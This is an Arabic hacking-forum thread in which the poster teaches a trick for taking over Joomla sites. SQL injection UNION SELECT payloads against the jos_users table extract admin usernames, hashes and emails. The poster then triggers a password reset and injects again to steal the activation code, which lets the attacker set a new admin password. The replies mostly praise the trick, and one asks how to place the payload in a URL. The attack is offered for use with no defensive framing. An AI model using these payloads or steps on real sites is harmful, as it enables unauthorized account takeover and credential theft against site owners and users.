السلام عليكم و رحمة الله تعالى و بركاته

طبعا الكل يعرف أنو معضم ثغرات الجوملة على مواقع الحماية سيكول
لكن تقريبا الكل يقف عند استخراج الهاش لأنو قليلا ما يمكن فكه
في هاذا الموضوع حبيت أطرح حيلة صغيرة تساعد على دعس الهدف


+union+select+1,concat_ws(username,0x3a,password), 3+from+jos_users--طبعا هاذي الحقنة عادي كما يعرفها الكل
و طلبنا فيها اليوزر و الباس
--
خلونا نطلب الإيميل بدل الباس

+union+select+1,concat_ws(username,0x3a,email),3+f rom+jos_users--لحد الآن كل شيئ بسيط
-
-
الخطوة اللي بعدها أنا نروح نقول لسكربت الجوملة أننا نسينا الباس
عبر هاذا الرابط

/index.php?option=com_user&view=resetنحط بيانات المدير و نضغط ok

رح يتم ارسال كود أكتفيشن ( activation ) لإيميل المدير

و رح يطلب منا السكربت الكود هاذا كي نستطيع إعادة وضع الباس

و هنا اللعبة
الكود هاذا ينزل على قاعدة البيانات أيضا .. يعني رح نجيبه بالحقن :tongue:

فقط هكذا

+union+select+1,concat_ws(email,0x3a,username,0x3a ,activation),3+from+jos_users--الآن كود الأكتفيشن عندك
روح اللوحة اللي وقفنا عندها بعد وضع بيانات المدير

و أعطيه كود الأكتفيشن
رح يقلك أعطيني الباس الجديد
حط باس من عندك ... و اسم المدير عندنا

مبروك عليك الموقع :tongue:

دمتم في رعاية الله

سلمت يمناك على هذا الموضوع الرااائع والمميز

شرح ولا أروع

دمت في تألق وابداع

جزآك الله خيرٍ . .

وننتظر جديدكـُ . .

شرح ولا اروع يعطيك الف عافيه

واصل تقدمك وأبداعك

تحياتي لك

والله ابداااااااع يعطيك الف عافيه تستحق خمس نجوم

الله يعطيك العافية حيلة جدا ذكية موفق

ولله قوية احسنت اخي

مشكورررررررررررررررر

والله خدعه جد جميله اخي
بجد والله انك تحفه
بارك الله فيك وادامك لاهلك والجيوش ادام اهلك لك
بالتوفيق حبيبي

تسلم شرح رائع
تقبل مروري

السلام عليكم

+union+select+1,concat_ws(username,0x3a,password), 3+from+jos_users--
هذا نخليه هيك

www.xxx.com/index.php+union+select+1,concat_ws(username,0x3a,p assword),3+from+jos_users--

????

الشرح جميل وحلو

شكراااااااااااااااااااااا ااااااااااااااااا